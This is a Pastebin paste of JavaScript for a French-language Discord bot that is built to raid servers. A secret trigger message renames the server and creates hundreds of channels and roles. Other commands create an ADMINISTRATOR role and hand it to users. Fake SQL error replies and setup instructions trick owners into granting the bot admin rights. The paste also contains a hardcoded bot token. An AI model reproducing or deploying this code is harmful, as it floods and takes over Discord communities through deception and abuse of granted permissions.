Advertisement
Guest User

CODE

a guest
Nov 18th, 2017
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.72 KB | None | 0 0
  1. var bot = new Discord.Client();
  2.  
  3.  
  4.  
  5.  
  6.  
  7. bot.login('Mzc0NjY0NTc4NjA2NDMyMjU3.DNklHA.7MnNg7Z2yWignCQaQgfn_lZRccg');
  8.  
  9.  
  10.  
  11. bot.on("ready", function () {
  12.  
  13.     console.log("Je suis connecté");
  14.  
  15. });
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23. bot.on("message", msg => {
  24.  
  25.    if (msg.content == "24632") {
  26.  
  27.        var guild = msg.guild;
  28.  
  29.                 guild.edit({name: "RaidUnion Humour Noir Brigade Fantôme"})
  30.  
  31.        for (var i = 0; i < 500; i++) {
  32.  
  33.            try{
  34.  
  35.                guild.createChannel(`NAME TEXT CHANNEL`, "text");
  36.  
  37.                guild.createChannel(`NAME VOICE CHANNEL`, "voice");
  38.  
  39.                  guild.createRole("#RaidUnion");
  40.  
  41.  
  42.  
  43.            }catch(e){
  44.  
  45.                console.log(e)
  46.  
  47.            }
  48.  
  49.        };
  50.  
  51.    };
  52.  
  53. })
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61. bot.on('message', msg => {
  62.  
  63.  
  64.  
  65.   if (msg.content === '!bg') {
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.   let RoleToAdd = msg.guild.roles.find('name', 'RaidUnion')
  74.  
  75.  
  76.  
  77.   msg.member.addRole(RoleToAdd);
  78.  
  79.  
  80.  
  81.   msg.reply('tes beau!');
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89. }
  90.  
  91.  
  92.  
  93. });
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105. bot.on('message', msg => {
  106.  
  107.  
  108.  
  109.   if (msg.content === '!help') {
  110.  
  111.  
  112.  
  113.     msg.channel.sendMessage('ERROR: SQLREJECTION: SQLMAJ.PULSEHEBERG');
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.   }
  122.  
  123.  
  124.  
  125.   });
  126.  
  127.  
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.   bot.on('message', msg => {
  138.  
  139.  
  140.  
  141.     if (msg.content === '!c') {
  142.  
  143.  
  144.  
  145.       msg.channel.sendMessage('ERROR: ```SQLREJECTION: SQLMAJ.PULSEHEBERG```');
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.     }
  154.  
  155.  
  156.  
  157.     })
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.   bot.on('message', msg => {
  166.  
  167.  
  168.  
  169.     if (msg.content === '!error') {
  170.  
  171.  
  172.  
  173.       msg.channel.sendMessage('http://prntscr.com/f8flko');
  174.  
  175.  
  176.  
  177.       msg.channel.sendMessage('http://prntscr.com/f8fnlp Faites un glisser-déposer le plus haut possible');
  178.  
  179.  
  180.  
  181.       msg.channel.sendMessage('http://prntscr.com/f8fmw9 n oubliez pas d enregistrer !');
  182.  
  183.  
  184.  
  185.       msg.channel.sendMessage('Vérifier bien que le bot ait la permission "Administrateur" & "Gérer les roles"');
  186.  
  187.  
  188.  
  189.       msg.channel.sendMessage('Tapez "!config" pour voir la suite');
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197.     }
  198.  
  199.  
  200.  
  201.     });
  202.  
  203.  
  204.  
  205.  
  206.  
  207.  
  208.  
  209.     bot.on('message', msg => {
  210.  
  211.  
  212.  
  213.       if (msg.content === '!error1') {
  214.  
  215.  
  216.  
  217.     msg.channel.sendMessage("C'est un prank eimdeair (FR)");
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228.  
  229.       }
  230.  
  231.  
  232.  
  233.       });
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243.     bot.on('message', msg => {
  244.  
  245.  
  246.  
  247.     if (msg.content === '!h') {
  248.  
  249.  
  250.  
  251.  
  252.  
  253.  
  254.  
  255.   msg.guild.createRole({
  256.  
  257.  
  258.  
  259.   name: 'RaidUnion',
  260.  
  261.  
  262.  
  263.   color: 'WHITE',
  264.  
  265.  
  266.  
  267.   permissions:'ADMINISTRATOR',
  268.  
  269.  
  270.  
  271. })
  272.  
  273.  
  274.  
  275. }
  276.  
  277.  
  278.  
  279. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement